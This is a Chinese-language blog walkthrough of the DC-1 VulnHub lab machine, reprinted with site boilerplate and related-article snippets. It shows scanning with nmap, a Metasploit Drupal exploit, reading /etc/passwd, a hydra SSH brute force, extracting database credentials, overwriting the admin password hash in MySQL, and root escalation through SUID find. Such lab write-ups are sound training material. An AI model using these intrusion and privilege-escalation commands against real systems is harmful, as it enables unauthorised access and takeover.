DC-1靶机渗透测试详细教程

这篇具有很好参考价值的文章主要介绍了DC-1靶机渗透测试详细教程。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

DC-1

DC-1下载:https://download.vulnhub.com/dc/DC-1.zip

攻击者kali   IP:192.168.1.9

受害者DC-1   IP:192.168.1.8

将DC-1靶机调成和kali同为桥接模式,因为DC-1的账号和密码还不知道,所以不能查看DC-1的IP地址,那么我们将通过kali来扫描到DC-1的IP地址。

1 使用命令 arp-scan -l 列出当前局域网的所有设备,在DC-1的网络适配器查看到的mac地址和扫描出来的192.168.1.8一致。

DC-1靶机渗透测试详细教程

DC-1靶机渗透测试详细教程

2 使用nmap来扫描DC-1

nmap -A 192.168.1.8

DC-1靶机渗透测试详细教程

从扫描结果可以看到有22和80端口,因为还不知道DC-1所使用的用户,所有还不能爆破ssh,先访问一下80端口网页。

3 访问到的web界面,发现需要账号密码登录,使用burp爆破没有结果。但是发现了CMS,尝试去msf的漏洞库搜索一下。

DC-1靶机渗透测试详细教程

DC-1靶机渗透测试详细教程

4 在msf漏洞库搜索 Drupal,并攻击

启动msf的数据库

msfdb start

DC-1靶机渗透测试详细教程

启动msfconsole

搜索 search Drupal

DC-1靶机渗透测试详细教程

使用第二个漏洞

use 2

DC-1靶机渗透测试详细教程

使用shuow missing查看一下必须要设置的选项

DC-1靶机渗透测试详细教程

需要设置rhosts,rhosts就是设置靶机的IP地址

使用set设置

set rhosts 192.168.1.8

使用show options 可以查看设置好的信息

DC-1靶机渗透测试详细教程

确定设置的信息没问题

输入run开始执行攻击,成功

DC-1靶机渗透测试详细教程

flag1

ls可以看到第一个flag1.txt

DC-1靶机渗透测试详细教程

第一个falg找到

DC-1靶机渗透测试详细教程

5查看一下靶机的用户,发现有个flag4的用户

cat /etc/passwd

DC-1靶机渗透测试详细教程

6 使用hydra来爆破一波看看是否能拿到密码

hydra -l flag4 -P /usr/share/john/password.lst 192.168.1.8 ssh

DC-1靶机渗透测试详细教程

得到falg4账号的密码为 orange

7 使用ssh连接靶机

DC-1靶机渗透测试详细教程

flag4

ls在flag4账户的目录下找到了falg4,可想而知还有在前面还有两个flag,可能在web上,因为web有账号

DC-1靶机渗透测试详细教程

8 既然已经登录进靶机了,那么我们就去查看一下web的配置文件

进度入到var/www的目录下

在百度上可以找到drupal的配置文件是/var/www/sites/default/settings.php

使用命令查看一下

cat sites/default/settings.php

在配置文件中看到了flag2还有数据库的信息

flag2

DC-1靶机渗透测试详细教程

数据库的账号:dbuser  密码: R0ck3t

9 使用命令连接数据库

mysql -u dbuser -p

连接成功

DC-1靶机渗透测试详细教程

查看一下数据表

show databses;

DC-1靶机渗透测试详细教程

使用数据表use drupaldb

DC-1靶机渗透测试详细教程

查看表的数据show tables;

DC-1靶机渗透测试详细教程

注意到表里的users

使用命令查看一下

select * from users;

DC-1靶机渗透测试详细教程

可以看到管理员的账户,但是先要搞hash值,有点难

quit退出数据库连接

10 搜索一下passwd

find / -name password*

DC-1靶机渗透测试详细教程

可以看到var/www/scripts下有个sh的脚本

直接执行试试

DC-1靶机渗透测试详细教程

可以设置密码,尝试一下后面加上密码

scripts/password-hash.sh 123456

DC-1靶机渗透测试详细教程

得到一个哈希值,那么我们可以将这个哈希值替换到数据库admin得账号下

11 修改数据库中admin的哈希值

update users set pass='$S$DvaDIRP8Hxz93/2ZLLeQrczm5gK1BR6KrJX2JmOGPB7boVeFE3wa' where name='admin';

DC-1靶机渗透测试详细教程

修改成功尝试去web界面登录试试

DC-1靶机渗透测试详细教程

flag3

找到flag3

DC-1靶机渗透测试详细教程

12  falg4提示我们提权

DC-1靶机渗透测试详细教程

find -name flag4.txt -exec /bin/bash -p \;

flag5

DC-1靶机渗透测试详细教程

find -name flag4.txt -exec cat /root/thefinalflag.txt \;

DC-1靶机渗透测试详细教程

CD-1靶机一共有5个flag

DC-1总结

nmap的基础使用,信息收集

msf漏洞库搜索漏洞

使用漏洞攻击靶机拿到shell,找到第一个flag,查看/etc/passwd

使用hydra爆破ssh登录的账号密码

登陆账号拿到第二个flag

查看到durpal的配置文件,获取到数据库信息,拿到第三个flag

尝试连接数据库,在数据库里发现admin账号,修改管理员的hash值

登录到web界面,拿到第四个flag

提权root拿到第五个flag文章来源地址https://www.toymoban.com/news/detail-482703.html

到了这里,关于DC-1靶机渗透测试详细教程的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 网络安全竞赛——综合靶机渗透测试ZHCS-2全过程解析教程

    任务一:综合靶机渗透测试 任务环境说明: 服务器场景:ZHCS-2(关闭连接) 服务器场景操作系统:版本不详 扫描目标靶机将靶机开放的所有端口,当作flag提交(例:21,22,23)   FLAG:22,80 扫描目标靶机将靶机的http服务版本信息当作flag提交(例:apache 2.3.4)   FLAG: lighttpd 1.

    2024年02月09日
    浏览(31)
  • lampiao靶机渗透测试

    一、前言         已经好久没有复习过主机渗透的相关知识了,上一次进行渗透的学习已经是4个月前了,本篇对lampiao靶机进行一下渗透测试。  二、信息采集  第一步先查看自身kali主机网段,ip为192.168.119.128,24位子网掩码。   接着使用下面的命令nmap扫描出靶机的ip为

    2024年02月13日
    浏览(36)
  • DC-3渗透实战(详细过程)

    目录 DC-3靶机 1.主机发现 2.端口扫描 3.网页信息探测 4.敏感目录扫描 5.漏洞查找和漏洞利用 漏洞查找 joomscan searchsploit 漏洞利用 sqlmap John 反弹shell 交互式shell 6.收集信息 7.主机渗透 系统漏洞查找 exp提权 DC-3靶场下载地址http://www.five86.com/downloads/DC-3-2.zip 安装按照我DC-1的文章 如

    2024年02月07日
    浏览(26)
  • DC-3靶场搭建及渗透实战详细过程(DC靶场系列)

    目录 一. 信息收集 1. 主机扫描 2. 端口扫描  3. 目录扫描 4. web页面信息探测 二. 漏洞找查 1. joomscan 2. searchsploit 三. 漏洞利用 1. SQL注入 2. 密码爆破 3. 反弹shell 4. Get交互shell 四. Linux提权 1. 确定操作系统信息 2. 搜索操作系统漏洞 3. 利用exp提权 4. 找查flag 五. 收获总结 1. joomsca

    2023年04月15日
    浏览(70)
  • DC-4靶场搭建及渗透实战详细过程(DC靶场系列)

    目录 一. 信息收集 1. 主机扫描 2. 端口扫描 3. 目录扫描 4. 页面信息探测 二. 渗透过程 1. 用户登入爆破 2. 任意命令执行 3. 反弹shell 4. Linux提权(假) 4. Linux提权(真) 5. 查找flag 三. 收获总结 1. netcat反弹shell命令 2. teehee提权 DC-4靶场下载地址https://www.five86.com/downloads/DC-4.zip 搭

    2024年02月05日
    浏览(31)
  • vulnhub_DeRPnStiNK靶机渗透测试

    VulnHub2018_DeRPnStiNK靶机 https://www.vulnhub.com/entry/derpnstink-1,221/ flag1(52E37291AEDF6A46D7D0BB8A6312F4F9F1AA4975C248C3F0E008CBA09D6E9166) flag2(a7d355b26bda6bf1196ccffead0b2cf2b81f0a9de5b4876b44407f1dc07e51e6) flag4(49dca65f362fee401292ed7ada96f96295eab1e589c52e4e66bf4aedda715fdd) 信息收集 使用nmap扫描靶机发现开放了 21 22 80 端口,

    2024年02月08日
    浏览(33)
  • Neos的渗透测试靶机练习——DarkHole-2

    1. 搜集信息 输入 sudo su ,将kali切换到 root权限 ; 输入 ifconfig 查询自身ip,即 攻击机ip ; 可以看到 自身ip 为 192.168.56.101 。 输入 arp-scan -l 扫描本网段存活主机,即 靶机ip地址 。 可以看到 靶机ip 为 192.168.56.105 ,。 输入 nmap -sV -p- 192.168.56.105 扫描靶机 所有端口开放情况 。

    2024年01月23日
    浏览(39)
  • [渗透测试学习靶机07] vulnhub靶场 Prime 2

    Kali的IP地址:192.168.127.139 靶机的IP地址:192.168.127.145 目录 一、信息搜集 二、漏洞挖掘 三、漏洞利用 四、提权 总结: Prime 2这个靶机我看网上很少有人通关打靶练习,自己尝试做了一下,感觉整体难度:比较难,大家可以参考一下。 1.1、扫描主机IP 1.2、扫描端口 发现开放了

    2024年02月05日
    浏览(38)
  • 看完这篇 教你玩转渗透测试靶机vulnhub——My File Server: 2

    vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 这是一个漏洞靶机,老样子需要找到flag即可。 官方下载:https://download.vulnhub.com/myfileserver/My_file_server_2.o

    2023年04月19日
    浏览(37)
  • dc-6靶机

    1.使用nmap进行信息搜集,存活主机,端口 192.168.85.184是存活主机,发现开放22,80端口 2.访问192.168.85.184的80端口 发现被重定向了,修改hosts文件 3.对网站进行信息搜集并进行相关利用 找到一段信息 主要是说插件安全的问题,估计利用wordpress插件的漏洞 访问http://192.168.85.184/

    2024年02月01日
    浏览(25)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包